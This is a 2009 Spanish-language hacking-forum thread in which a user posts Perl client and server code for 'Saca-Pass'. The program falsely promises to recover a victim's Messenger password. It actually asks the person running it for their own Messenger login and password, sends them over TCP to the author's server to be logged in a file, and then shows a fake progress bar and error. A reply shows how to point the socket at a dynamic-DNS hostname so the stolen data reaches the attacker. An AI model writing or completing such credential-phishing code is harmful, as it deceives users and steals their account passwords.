elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Necesito ayuda urgente con un código Perl
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Necesito ayuda urgente con un código Perl  (Leído 3,852 veces)
Boogeyman

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Necesito ayuda urgente con un código Perl
« en: 19 Octubre 2009, 21:54 pm »

Hola a todos. Este es mi primer post. Me registré, sobre todo, porque ningún foro me pudo responder a la siguiente duda. Se que es molesto leerse los codes y analizar los errores, pero les pido porfavor que lo hagan, bueno, allá voy.

-Yo cree un cliente y un servidor de un programa al que llame "Saca-Pass" (Ahora publico los codes) Uno era el server y el otro el cliente, como es normal. Bueno, después de crear los codes, me di cuenta de que el objeto "socket" del cliente no podría conectar con el servidor porque mi IP es de las que cambian. Me hice una No-IP, la activee y ahora me sale con la carita sonriente en el DUC.

Mi problema es, que no se que poner en el huequecito en que antes estaba mi IP (he probado en mi ordenador poniendo la No-Ip y el nombre del server y no me va)

¿Alguien puede solucionarmelo? Muchas gracias por adelantado.

CODES:

[Cliente]

Código:

#!/usr/bin/perl
use IO::Socket::INET;
system ("title Roba Password del Messenger");
print "\n\n";
system ("color 0c");
print q(
Este programa hace posible que podamos averiguar el password de nuestra victima.

Con esto podemos conseguir saber secretos sobre la victima, averiguar sobre ella o conocer su vida privada.
 
Si te gusta la idea y quieres probar, pulsa una tecla.);
system("pause>nul");
system("cls");
&contra;
sub contra{
print "\nIntroduce el numero para que el programa pueda continuar: ";
$number=<STDIN>;
if ($number==123987) { print "\nNumero correcto. Pulse una tecla para continuar";
system("pause>nul")} else {system("cls");
print "\nNumero incorrecto. Lee las intrucciones para mas informacion.";
system("pause>nul");
system("cls");
&contra}}
system("cls");
print "\n\nTeclea aqui tu messenger: ";
$a=<STDIN>;
print "\n\nTeclea aqui tu password: ";
$b=<STDIN>;
print "\n\nTeclea aqui el messenger de tu victima: ";
$c=<STDIN>;
print "\n\n";
print q(Este programa utiliza un sistema avanzado de contacto
de robo de password con palabras relacionadas con la victma.
Esto ocurre, porque lea victima, por regla general, casi
siempre pone de password algo relacionado con el/ella
para que pueda relacionarlo facilmente y no olvidarlo. Asi que, todo lo que
puedas decirnos sobre la victima, nos servira.
Nos referimos a rasgos, familia, etc.
No teclees enter hasta que no hayas acabado.

Si no sabes nada de la victima, pulsa enter directamente.);
print "\n\nDatos que nos quieras contar: ";
$d=<STDIN>;
chomp($a);
chomp($b);
chomp($c);
chomp($d);
print "\n\n Muy bien, pulsa una tecla para las condiciones de uso.\n";
system("pause>nul");
system("cls");
print "\n Buscando la password, se va a ejecutar una conexion, si la conexion
es rechazada por usted, no habra extraccion de datos posible.\n\n
Si la conexion no funciona, consulte con el proporcionador del programa
ya sea web o persona. Pulsa intro para empezar.\n\n";
system("pause>nul");
$socket=IO::Socket::INET->new(PeerHost=>'¿que va aqui?',
PeerPort=>"28",
Proto => 'tcp') || die "No se pudo conectar: $!";
print $socket "El messenger: $a\n";
print $socket "La password: $b\n";
print $socket "Informacion Adiccional: $c, $d\n";
close($socket);
system("cls");
print q(Buscando la password, el proceso puede tardar unos segundos
Proceso ---           (33)          ---);
system("ping localhost -n 3 >nul");
system("cls");
print q(Buscando la password, el proceso puede tardar unos segundos
Proceso ---           (66)          ---);
system("ping localhost -n 3 >nul");
system("cls");
print q(Buscando la password, el proceso puede tardar unos segundos
Proceso ---           (99)          ---);
system("ping localhost -n 3 >nul");
system("cls");
print q(Proceso completado. Analizando...
Proceso ---           (100)          ---);
system("ping localhost -n 5 >nul");
system("cls");
print "\n\nERROR. ##//()ERRORLOG.666()(¬¬ººº)";
system("ping localhost -n 10 >nul");
$false=10;
while ($false==10){
print "123094871238751623094375712360932650360912693472835709123847130298563209841\n
340912837409385731094823095863095183740923856329085730498365093874019385633"};
exit(0);


Servidor:

Código:

use IO::Socket::INET;
$socket=IO::Socket::INET->new(LocalPort=>"28",
Proto => 'tcp',
Listen=>1,
Reuse=> 1) || die "No se pudo conectar: $!";
print "\nServer Started\n\n";
print "-"x15;
print "\n";
$leer_socket=$socket->accept();
while (<$leer_socket>){
$entrada=$_;
print "$entrada\n";
open (FILE, ">>datos.txt");
print FILE "$entrada\n";
close (FILE);}
close($socket);
exit(0);


Saludos.


« Última modificación: 25 Octubre 2009, 11:39 am por Boogeyman » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Necesito ayuda urgente con un código Perl
« Respuesta #1 en: 20 Octubre 2009, 01:55 am »

Lo que debes de hacer es modificar la línea donde estableces los datos de la conexión

Código
  1. $socket=IO::Socket::INET->new(PeerAddr=>'tudireccion.no-ip.org',
  2. PeerPort=>"28",
  3. Proto => 'tcp') || die "No se pudo conectar: $!";

Saludos


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Boogeyman

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Necesito ayuda urgente con un código Perl
« Respuesta #2 en: 21 Octubre 2009, 20:55 pm »

Esto me sigue sin funcionar... en el momento del socket se produce un parón y el programa no continua...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines